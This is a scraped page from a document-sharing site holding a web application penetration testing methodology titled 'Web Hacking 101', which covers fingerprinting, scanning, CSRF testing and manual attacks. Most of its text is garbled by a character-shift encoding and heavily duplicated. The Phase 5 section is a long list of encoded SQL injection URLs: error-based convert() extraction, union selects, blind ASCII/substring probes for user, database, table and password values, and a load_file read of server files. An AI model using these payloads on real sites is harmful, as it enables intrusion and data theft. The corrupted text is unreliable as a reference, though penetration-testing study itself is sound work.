LDMT4DKDBS1QDEDQDMBDR"CU@MBDC/DSVNQJ4DSSHMFRSNFDSSGDOQNWX
BNMEHFTQ@SHNMCH@KNF
$43'5DRSDQCDE@TKSRSNTRHMFONQSNMKNB@KGNRSENQHSROQNWX:NTMDDCSNBNMEHFTQD
'HQDENWSNQDK@XQDPTDRSRSN$43'5DRSDQ Q@SGDQSG@MEDSBGHMFSGDLHSRDKE @RRGNVMHMSGD
@ANUDHL@FD.@JDRTQDSG@SSGD/N1QNWXENQANWHRAK@MJDCNTS0MBDXNTG@UD
BNMEHFTQDCEHQDENWSNTRDSGDOQNWX RDKDBS0JNM@KKCH@KNFRSNFDSA@BJSNSGDAQNVRDQ
#QNVRDSN@MNM44-VDARHSD @MCSGDMRVHSBGSN$43'5DRSDQ
BCNV@ROBRQESDRSDQQD@CNMKXL@HM$43'5DRSDQCHRS
I@U@I@Q08"41$43'5DRSDQI@QMYH
*ESGDOQNWXV@RRTBBDRRETKKXBNMEHFTQDC $43'5DRSDQVHKKFDMDQ@SDCDATFLDRR@FDRSN
RSCNTSENQ@KKRTARDPTDMS)551QDPTDRSRFDMDQ@SDCAXXNTQAQNVRDQ"SSGHRONHMS VD
MDDCSNKNB@SD@O@QSHBTK@QATRHMDRRETMBSHNMSG@SVDV@MSSNSDRSENQ$43'#QNVRDSN
SGDO@FDVGDQDSGDATRHMDRRETMBSHNM NQETMBSHNMR
@QDEHQRSKN@CDC0MBDSGHRO@FDHR
KNB@SDC RDKDBSSGD4S@QS3DBNQCHMFATSSNMHM$43'5DRSDQ@MCDWDBTSDSGDATRHMDRR
ETMBSHNMNQETMBSHNMR0MBDBNLOKDSD BKHBJSGD4SNO3DBNQCHMFATSSNMVHSGHM
$43'5DRSDQ:NTKKMNSHBDSG@SSGDKHRSNMSGDL@HMRBQDDMMNVG@R@RDQHNTRNEQDPTDRSR
QDBNQCDC5GDRD@QD@KKNESGD(&51045QDPTDRSRFDMDQ@SDCAXNTQAQNVRDQVGHKD
DWDBTSHMFSGDATRHMDRRETMBSHNM R
#XRDKDBSHMFNMDNESGDQNVRHMSGDKHRS VDMNVG@UD
SGD@AHKHSXSNLNCHEXSGDO@Q@LDSDQRSG@SVDQDTRDCSNDWDBTSDSGDATRHMDRRETMBSHNM8D
B@MLNCHEXSGDPTDQXRSQHMFO@Q@LDSDQR@MCENQLO@Q@LDSDQRSGQNTFGSGDHQ
QDRODBSHUDO@MDRNMSGDANSSNLG@KENESGDRBQDDM/NSDSG@SSGDRD@QDSGDU@KTDRVD
VHRGSNSQHBJSGDDMCTRDQHMSNRTALHSSHMF0MBD@KKNESGDO@Q@LDSDQRG@UDADDM
LNCHEHDCSNBNMS@HMXNTQCDRHQDCU@KTDR VD@QDMNVQD@CXSNADFHMFDMDQ@SHMF)5.QDONQSR
Generate HTML Reports

5GD)5.-QDONQSRFDMDQ@SDCAXSGD$43'5DRSDQSNNK@QDTRDCSNB@QQXNTSSGD$43'SDRS
B@RDR@F@HMRSNSGDQTRDQRNESGDVDA@OOKHB@SHNM5NFDMDQ@SD@QDONQS VDEHQRSLTRS
RDKDBS@QDONQSSXOD5GDQDONQSSXODCDSDQLHMDRGNVVDV@MSSGDUHBSHLRAQNVRDQSN
RTALHSSGDOQDUHNTRKXQDBNQCDCQDPTDRSR5GDQDBTQQDMSKXDWHRSRONRRHAKDQDONQSR
ENQLR H'Q@LD *.( 9)3 @MC-HMJ
Forms: This report type will submit the request(s) using auto-posting forms
iFrame: This report type will submit the request(s) using and autosubmitting iframe tag.
IMG: This report will submit the request(s) using the <img src="..."/> tag
XHR: This report will submit the request(s) using XMLHttpRequest. Note that
this is subject to the same origin policy.
Link: This report will submit the request(s) when the user clicks a link.
0MBD@QDONQSSXODHRRDKDBSDC XNTB@MNOSHNM@KKXK@TMBGSGDMDVKXFDMDQ@SDCQDONQSHM
XNTQAQNVRDQ5NDM@AKDCHR@AKDSGHRNOSHNM BGDBJTMBGDBJSGD%HROK@XHM#QNVRDQ
BGDBJANWMDWSSNSGD(DMDQ@SD)5.-ATSSNMHMSGDANSSNLQHFGSG@MCBNQMDQ'HM@KKX
VDB@MBKHBJSGD(DMDQ@SD)5.-ATSSNMSNBQD@SDSGD)5.-QDONQSSG@SVHKKRTALHSNTQ
QDBNQCDC @MCONRRHAKXLNCHEHDC
@BSHNMR5NB@QQXNTSSGDSDRSB@RD NODM@MDVAQNVRDQ
HMRS@MBD @TSGDMSHB@SD@R@MNSGDQTRDQVHSG@BBDRRSNSGDR@LDATRHMDRRETMBSHNM R
@MC
G@UDSG@STRDQAQNVRDQK@TMBGSGDMDVKXBQD@SDC)5.-QDONQSEHKD*ESGD@BSHNMV@R
B@QQHDCNTS@ESDQUHDVHMFSGDEHKDHMSGDR@LDAQNVRDQVHMCNVSG@SV@RTRDCSN
@TSGDMSHB@SDSGDMDVTRDQ HDSGDUHBSHL
SGDMSG@SO@QSHBTK@QATRHMDRRETMBSHNMHR
UTKMDQ@AKDSNBQNRRRHSDQDPTDRSENQFDQX
Phase 6: Documentation and

Reporting
3DRTKSR7DQHEHB@SHNM
*CDMSHEXHMF'@KRD1NRHSHUDR
"RRDRRHMF7TKMDQ@AHKHSX$QHSHB@KHSX
3DONQS4SQTBSTQD
^ &WDBTSHUD4TLL@QX
^ 3HRJ.@SQHW
^ #DRS1Q@BSHBDR NOSHNM@KATSUDQXTRDETK
^ 'HM@K4TLL@QX

Web Hacking 101

Cargado por

Información del documento

Derechos de autor

Formatos disponibles

Compartir este documento

Compartir o incrustar documentos

Opciones para compartir

¿Le pareció útil este documento?

¿Este contenido es inapropiado?

Copyright:

Formatos disponibles

Web Hacking 101

Cargado por

Copyright:

Formatos disponibles

Tactical Web Application

Penetration Testing Methodology

Phase 2: Platform Determination

2. Determine if the target is load balanced

4. Determine if the target is protected by a WAF

5. Determine the target platform

Technology Server Platform

7. Look for server mis-configurations

* TRACE Method Enabled

HTTP Vulnerable Response:

Phase 3: Automatic Attack

2. Web Spidering and vulnerability identification with an active scanner

2a. Dealing with an Open-Source CMS

3. Discover Hidden Content

Phase 4: Manual Attack Surface

Phase 4b) Look for the less popular vulnerabilities

%NVMKN@C@MCCDBNLOHKDI@U@@OOKDSR RGNBJV@UDEHKDR @BSHUD9BNMSQNKR

2. Identify Client-Side Security Controls and attempt to bypass them

var reg = /^([A-Za-z0-9_\-\.])+\@([A-Za-z0-9_\-\.])+\.([A-Zaz]{2,4})$/;

4. Test SSL Ciphers

Phase 5: Manual Attacks

GSSO<RHSD>O@FD@RO HC NQHM 4&-&$5%#?/".& 

GSSO<RHSD>O@FD@RO HCNQHM RDKDBSSNOM@LDEQNLRXRNAIDBSRVGDQD

GSSO<RHSD>O@FD@RO HC NQHM RDKDBSSNOM@LDEQNLRXRNAIDBSRVGDQD

GSSO<RHSD>O@FD@RO HC NQHM RDKDBSSNOBNKTLM?M@LDEQNL

GSSO<RHSD>O@FD@RO HC NQHM RDKDBSSNOBNKTLM?M@LDEQNL

GSSO<RHSD>O@FD@RO HC NQBNMUDQS HMS RDKDBSSNO$0-6.//".&EQNL

GSSO<RHSD>O@FD@RO HC NQBNMUDQS HMS RDKDBSSNO$0-6.//".&EQNL

GSSO<RHSD>O@FD@RO HCTMHNMRDKDBSRTL BNKTLM?M@LD

GSSO<RHSD>O@FD@RO HCTMHNMRDKDBSRTL BNKTLM?M@LD

GSSO<RHSD>O@FD@RO HC6/*0/4&-&$5"-- 64&3  

GSSO<RHSD>O@FD@RO HC6/*0/4&-&$5"-- !!4&37&3/".&  

GSSO<RHSD>O@FD@RO HC 6/*0/4&-&$5"-- BNKTLM?M@LD  EQNL

GSSO<RHSD>O@FD@RO HC*' "4$** KNVDQ RTARSQHMF 64&3

GSSO<RHSD>O@FD@RO HC*' "4$** KNVDQ RTARSQHMF 64&3

GSSO<RHSD>O@FD@RO HC*' "4$** KNVDQ RTARSQHMF 64&3

GSSO<RHSD>O@FD@RO HC*' "4$** KNVDQ RTARSQHMF 64&3

GSSO<RHSD>O@FD@RO HC*' "4$** KNVDQ RTARSQHMF 64&3

GSSO<RHSD>O@FD@RO HC*' "4$** KNVDQ RTARSQHMF 64&3

GSSO<RHSD>O@FD@RO HC*' "4$** KNVDQ RTARSQHMF %#?/".&

GSSO<RHSD>O@FD@RO HC*' "4$** KNVDQ RTARSQHMF %#?/".&

GSSO<RHSD>O@FD@RO HC*' "4$** KNVDQ RTARSQHMF %#?/".&

GSSO<RHSD>O@FD@RO HC*' "4$** KNVDQ RTARSQHMF %#?/".&

GSSO<RHSD>O@FD@RO HC*' "4$** KNVDQ RTARSQHMF %#?/".&

GSSO<RHSD>O@FD@RO HC*' "4$** KNVDQ RTARSQHMF %#?/".&

GSSO<RHSD>O@FD@RO HC*' "4$** KNVDQ RTARSQHMF %#?/".&

GSSO<RHSD>O@FD@RO HC*' "4$** KNVDQ RTARSQHMF %#?/".&

GSSO<RHSD>O@FD@RO HC*' -&/ 4&-&$5501/".&EQNLRXRNAIDBSRVGDQD

GSSO<RHSD>O@FD@RO HC*' "4$** KNVDQ RTARSQHMF 4&-&$5501/".&EQNL

GSSO<RHSD>O@FD@RO HC*' "4$** KNVDQ RTARSQHMF 4&-&$5501/".&EQNL

GSSO<RHSD>O@FD@RO HC*' "4$** KNVDQ RTARSQHMF 4&-&$5501/".&EQNL

GSSO<RHSD>O@FD@RO HC*' "4$** KNVDQ RTARSQHMF 4&-&$5501/".&EQNL

GSSO<RHSD>O@FD@RO HC*' "4$** KNVDQ RTARSQHMF 4&-&$5501/".&EQNL

GSSO<RHSD>O@FD@RO HC*' "4$** KNVDQ RTARSQHMF 4&-&$5501/".&EQNL

GSSO<RHSD>O@FD@RO HC*' "4$** KNVDQ RTARSQHMF 4&-&$5501/".&EQNL

GSSO<RHSD>O@FD@RO HC*' "4$** KNVDQ RTARSQHMF 4&-&$5501/".&EQNL

GSSO<RHSD>O@FD@RO HC*' "4$** KNVDQ RTARSQHMF 4&-&$5501/".&EQNL

GSSO<RHSD>O@FD@RO HC*' "4$** KNVDQ RTARSQHMF 4&-&$5501/".&EQNL

GSSO<RHSD>O@FD@RO HC*' "4$** KNVDQ RTARSQHMF 4&-&$5501/".&EQNL

GSSO<RHSD>O@FD@RO HC*' "4$** KNVDQ RTARSQHMF 4&-&$5501/".&EQNL

GSSO<RHSD>O@FD@RO HC*' "4$** KNVDQ RTARSQHMF 4&-&$5501/".&EQNL

GSSO<RHSD>O@FD@RO HC*' "4$** KNVDQ RTARSQHMF 4&-&$5501/".&EQNL

GSSO<RHSD>O@FD@RO HC*' "4$** KNVDQ RTARSQHMF 4&-&$5501/".&EQNL

GSSO<RHSD>O@FD@RO HC*' "4$** KNVDQ RTARSQHMF 4&-&$5501/".&EQNL

%NVMKN@C@MCCDBNLOHKDI@U@@OOKDSR RGNBJV@UDEHKDR @BSHUD9BNMSQNKR

GSSO<RHSD>O@FD@RO HC NQHM 4&-&$5%#?/".&

GSSO<RHSD>O@FD@RO HCNQHM RDKDBSSNOM@LDEQNLRXRNAIDBSRVGDQD

GSSO<RHSD>O@FD@RO HC NQHM RDKDBSSNOM@LDEQNLRXRNAIDBSRVGDQD

GSSO<RHSD>O@FD@RO HC NQHM RDKDBSSNOBNKTLM?M@LDEQNL

GSSO<RHSD>O@FD@RO HC NQHM RDKDBSSNOBNKTLM?M@LDEQNL

GSSO<RHSD>O@FD@RO HC NQBNMUDQS HMS RDKDBSSNO$0-6.//".&EQNL

GSSO<RHSD>O@FD@RO HC NQBNMUDQS HMS RDKDBSSNO$0-6.//".&EQNL

GSSO<RHSD>O@FD@RO HCTMHNMRDKDBSRTL BNKTLM?M@LD

GSSO<RHSD>O@FD@RO HCTMHNMRDKDBSRTL BNKTLM?M@LD

GSSO<RHSD>O@FD@RO HC6/*0/4&-&$5"-- 64&3

GSSO<RHSD>O@FD@RO HC6/*0/4&-&$5"-- !!4&37&3/".&

GSSO<RHSD>O@FD@RO HC 6/*0/4&-&$5"-- BNKTLM?M@LD EQNL

GSSO<RHSD>O@FD@RO HC*' "4$** KNVDQ RTARSQHMF 64&3

GSSO<RHSD>O@FD@RO HC*' "4$** KNVDQ RTARSQHMF 64&3

GSSO<RHSD>O@FD@RO HC*' "4$** KNVDQ RTARSQHMF 64&3

GSSO<RHSD>O@FD@RO HC*' "4$** KNVDQ RTARSQHMF 64&3

GSSO<RHSD>O@FD@RO HC*' "4$** KNVDQ RTARSQHMF 64&3

GSSO<RHSD>O@FD@RO HC*' "4$** KNVDQ RTARSQHMF 64&3

GSSO<RHSD>O@FD@RO HC*' "4$** KNVDQ RTARSQHMF %#?/".&

GSSO<RHSD>O@FD@RO HC*' "4$** KNVDQ RTARSQHMF %#?/".&

GSSO<RHSD>O@FD@RO HC*' "4$** KNVDQ RTARSQHMF %#?/".&

GSSO<RHSD>O@FD@RO HC*' "4$** KNVDQ RTARSQHMF %#?/".&

GSSO<RHSD>O@FD@RO HC*' "4$** KNVDQ RTARSQHMF %#?/".&

GSSO<RHSD>O@FD@RO HC*' "4$** KNVDQ RTARSQHMF %#?/".&

GSSO<RHSD>O@FD@RO HC*' "4$** KNVDQ RTARSQHMF %#?/".&

GSSO<RHSD>O@FD@RO HC*' "4$** KNVDQ RTARSQHMF %#?/".&

GSSO<RHSD>O@FD@RO HC*' -&/ 4&-&$5501/".&EQNLRXRNAIDBSRVGDQD

GSSO<RHSD>O@FD@RO HC*' "4$** KNVDQ RTARSQHMF 4&-&$5501/".&EQNL

GSSO<RHSD>O@FD@RO HC*' "4$** KNVDQ RTARSQHMF 4&-&$5501/".&EQNL

GSSO<RHSD>O@FD@RO HC*' "4$** KNVDQ RTARSQHMF 4&-&$5501/".&EQNL

GSSO<RHSD>O@FD@RO HC*' "4$** KNVDQ RTARSQHMF 4&-&$5501/".&EQNL

GSSO<RHSD>O@FD@RO HC*' "4$** KNVDQ RTARSQHMF 4&-&$5501/".&EQNL

GSSO<RHSD>O@FD@RO HC*' "4$** KNVDQ RTARSQHMF 4&-&$5501/".&EQNL

GSSO<RHSD>O@FD@RO HC*' "4$** KNVDQ RTARSQHMF 4&-&$5501/".&EQNL

GSSO<RHSD>O@FD@RO HC*' "4$** KNVDQ RTARSQHMF 4&-&$5501/".&EQNL

GSSO<RHSD>O@FD@RO HC*' "4$** KNVDQ RTARSQHMF 4&-&$5501/".&EQNL

GSSO<RHSD>O@FD@RO HC*' "4$** KNVDQ RTARSQHMF 4&-&$5501/".&EQNL

GSSO<RHSD>O@FD@RO HC*' "4$** KNVDQ RTARSQHMF 4&-&$5501/".&EQNL

GSSO<RHSD>O@FD@RO HC*' "4$** KNVDQ RTARSQHMF 4&-&$5501/".&EQNL

GSSO<RHSD>O@FD@RO HC*' "4$** KNVDQ RTARSQHMF 4&-&$5501/".&EQNL

GSSO<RHSD>O@FD@RO HC*' "4$** KNVDQ RTARSQHMF 4&-&$5501/".&EQNL

GSSO<RHSD>O@FD@RO HC*' "4$** KNVDQ RTARSQHMF 4&-&$5501/".&EQNL

GSSO<RHSD>O@FD@RO HC*' "4$** KNVDQ RTARSQHMF 4&-&$5501/".&EQNL

GSSO<RHSD>O@FD@RO HC*' "4$** KNVDQ RTARSQHMF 4&-&$5501/".&EQNL

GSSO<RHSD>O@FD@RO HC*' "4$** KNVDQ RTARSQHMF 4&-&$5501/".&EQNL

GSSO<RHSD>O@FD@RO HC*' "4$** KNVDQ RTARSQHMF 4&-&$5501/".&EQNL

GSSO<RHSD>O@FD@RO HC*' "4$** KNVDQ RTARSQHMF 4&-&$5501/".&EQNL

GSSO<RHSD>O@FD@RO HC*' "4$** KNVDQ RTARSQHMF 4&-&$5501BNKTLM?M@LD

GSSO<RHSD>O@FD@RO HC*' "4$** KNVDQ RTARSQHMF 4&-&$5501BNKTLM?M@LD

GSSO<RHSD>O@FD@RO HC*' "4$** KNVDQ RTARSQHMF 4&-&$5501BNKTLM?M@LD

GSSO<RHSD>O@FD@RO HC*' "4$** KNVDQ RTARSQHMF 4&-&$5501BNKTLM?M@LD

GSSO<RHSD>O@FD@RO HC*' "4$** KNVDQ RTARSQHMF 4&-&$5501BNKTLM?M@LD

GSSO<RHSD>O@FD@RO HC*' "4$** KNVDQ RTARSQHMF 4&-&$5501BNKTLM?M@LD

GSSO<RHSD>O@FD@RO HC*' "4$** KNVDQ RTARSQHMF 4&-&$5501BNKTLM?M@LD

GSSO<RHSD>O@FD@RO HC*' "4$** KNVDQ RTARSQHMF 4&-&$5501BNKTLM?M@LD

GSSO<RHSD>O@FD@RO HC*' "4$** KNVDQ RTARSQHMF 4&-&$5501BNKTLM?M@LD

GSSO<RHSD>O@FD@RO HC*' "4$** KNVDQ RTARSQHMF 4&-&$5501BNKTLM?M@LD

GSSO<RHSD>O@FD@RO HC*' "4$** RTARSQHMF 4&-&$550164&3EQNL

GSSO<RHSD>O@FD@RO HC*' "4$** RTARSQHMF 4&-&$550164&3EQNL

GSSO<RHSD>O@FD@RO HC*' "4$** RTARSQHMF 4&-&$550164&3EQNL

GSSO<RHSD>O@FD@RO HC*' "4$** RTARSQHMF 4&-&$550164&3EQNL

GSSO<RHSD>O@FD@RO HC*' "4$** RTARSQHMF 4&-&$550164&3EQNL

GSSO<RHSD>O@FD@RO HC*' "4$** RTARSQHMF 4&-&$55011"44EQNL

GSSO<RHSD>O@FD@RO HC*' "4$** RTARSQHMF 4&-&$55011"44EQNL

GSSO<RHSD>O@FD@RO HC*' "4$** RTARSQHMF 4&-&$55011"44EQNL

GSSO<RHSD>O@FD@RO HC*' "4$** RTARSQHMF 4&-&$5501*% EQNL

GSSO<RHSD>O@FD@RO HC*' "4$** RTARSQHMF 4&-&$5501*% EQNL

GSSO<RHSD>O@FD@RO HC*' "4$** RTARSQHMF 4&-&$5501*% EQNL

GSSO<RHSD>O@FD@RO HC*' "4$** KNVDQ RTARSQHMF 4&-&$550164&3EQNL

GSSO<RHSD>O@FD@RO HC*' "4$** KNVDQ RTARSQHMF 4&-&$550164&3EQNL

GSSO<RHSD>O@FD@RO HC*' "4$** KNVDQ RTARSQHMF 4&-&$550164&3EQNL

GSSO<RHSD>O@FD@RO HC*' "4$** KNVDQ RTARSQHMF 4&-&$550164&3EQNL

GSSO<RHSD>O@FD@RO HC*' "4$** KNVDQ RTARSQHMF 4&-&$550164&3EQNL

GSSO<RHSD>O@FD@RO HC*' "4$** KNVDQ RTARSQHMF 4&-&$550164&3EQNL

GSSO<RHSDBNL>O@FDOGO MTKK TMHNM@KKRDKDBS KN@C?EHKD DSB

GSSO<RHSDBNL>O@FDOGO HC@MC@RBHH RTARSQHMF 4&-&$5

GSSO<RHSDBNL>O@FDOGO HC@MC@RBHH RTARSQHMF 4&-&$5

GSSO<RHSDBNL>O@FDOGO HC@MC@RBHH RTARSQHMF 4&-&$5

GSSO<RHSDBNL>O@FDOGO HC@MC@RBHH RTARSQHMF 4&-&$5